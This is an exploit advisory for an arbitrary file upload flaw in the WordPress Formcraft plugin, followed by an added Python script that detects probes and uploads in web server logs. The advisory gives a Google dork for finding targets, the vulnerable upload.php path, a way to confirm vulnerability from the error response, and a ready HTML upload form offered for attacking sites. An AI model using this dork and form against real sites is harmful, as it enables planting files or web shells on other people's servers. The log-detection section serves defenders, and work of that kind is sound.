Wordpress Formcraft Plugin File Upload Vulnerability

2016.02.15
Credit: Hacker Khan
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+] Exploit Title: Wordpress Formcraft Plugin File Upload Vulnerability
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+] Google Dork: intext:"powered by formcraft", inurl:plugins/formcraft
[+] Exploit Author: Iranian Anonymous
[+] Vendor Homepage: [https://wordpress.org/plugins/formcraft-form-builder/]
[+] Software Link: [-]
[+] Version: [All Version]
[+] Tested on: [Windows_Google Chrome & Mozilla]
[+] CVE : [-]
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+] DESCRIPTION: Hello guys. The vulnerability is of the file upload type. With this exploit you can upload your files.
[+] -->
[+] Exploit: [SITE]/wp-content/plugins/formcraft/file-upload/server/content/upload.php
[+] If you have received this error
[+] --> [{"failed":"No file found 2"}]
[+] This means that your target has this vulnerability.
[+] Script file Upload ==>
[+] [<title>iranonymous_InfernaL</title>
[+] <text>CW Wordpress Exploit</text>
[+] <form method="POST" action="
[+] [Target]/wp-content/plugins/formcraft/file-upload/server/content/upload.php
[+] " enctype="multipart/form-data">
[+] <input type="file" name="files[]" /><button> iranonymous Arama</button>
[+] </form>]
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+] Demo:
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+] Thanks to : MR.Khatar || KHAN || ll_azab-siyah_ll || iran || Sh@d0w || MaMaD_Malware || OnE_H4Ck3R || Shdmehr || B.D
[+] Happy Boy || Blackwolf_Iran || MR.zarvan || Security Soldier And All Of Iranian Anonymous
[+] We Are Iranian Anonymous Iranonymous.org
[+] Discovered By: Hacker Khan
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
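
For site owners, the two request patterns described above (a request to upload.php that is answered with the "No file found 2" error, then a multipart POST to the same script) can be searched for in web server access logs. The following is an added example, not code from the advisory or from the plugin; it assumes common/combined log format, and the verdict names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Endpoint named in the advisory, relative to the WordPress root.
UPLOAD_ENDPOINT = "/wp-content/plugins/formcraft/file-upload/server/content/upload.php"
# Common/combined log format: ip ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([A-Z]+) (\S+)[^"]*" (\d{3}) ')

def normalize(target):
    """Drop the query string, decode %-escapes, collapse '//' and lowercase."""
    path = unquote(target.split("?", 1)[0])
    return re.sub(r"/{2,}", "/", path).lower()

def classify(lines):
    """Map each client that touched the upload endpoint to a verdict."""
    probed, verdicts = set(), {}
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the assumed log format
        ip, method, target, status = m.groups()
        # endswith() also covers WordPress installed in a subdirectory.
        if not normalize(target).endswith(UPLOAD_ENDPOINT):
            continue
        if method == "POST" and status.startswith("2"):
            # The script accepted a POST: check the site for unexpected files.
            verdicts[ip] = "probe-then-upload" if ip in probed else "upload-attempt"
        else:
            # e.g. a GET answered with {"failed":"No file found 2"}
            probed.add(ip)
            verdicts.setdefault(ip, "probe")
    return verdicts

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    f'192.0.2.10 - - [15/Feb/2016:10:00:01 +0000] "GET {UPLOAD_ENDPOINT} HTTP/1.1" 200 31 "-" "Mozilla/5.0"',
    f'192.0.2.10 - - [15/Feb/2016:10:00:09 +0000] "POST {UPLOAD_ENDPOINT} HTTP/1.1" 200 58 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [15/Feb/2016:10:02:00 +0000] "GET /blog//wp-content/plugins/FormCraft/'
    'file-upload/server/content/upload%2Ephp?x=1 HTTP/1.1" 200 31 "-" "curl/7.47"',
    '203.0.113.5 - - [15/Feb/2016:10:03:00 +0000] "GET /index.php HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, verdict in classify(SAMPLE_LOG).items():
        print(ip, verdict)
```

A 2xx response to the POST does not prove that a file was stored, because access logs do not record request bodies; treat it as a reason to inspect the site for files that should not be there.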



Copyright 2018, cxsecurity.com

 
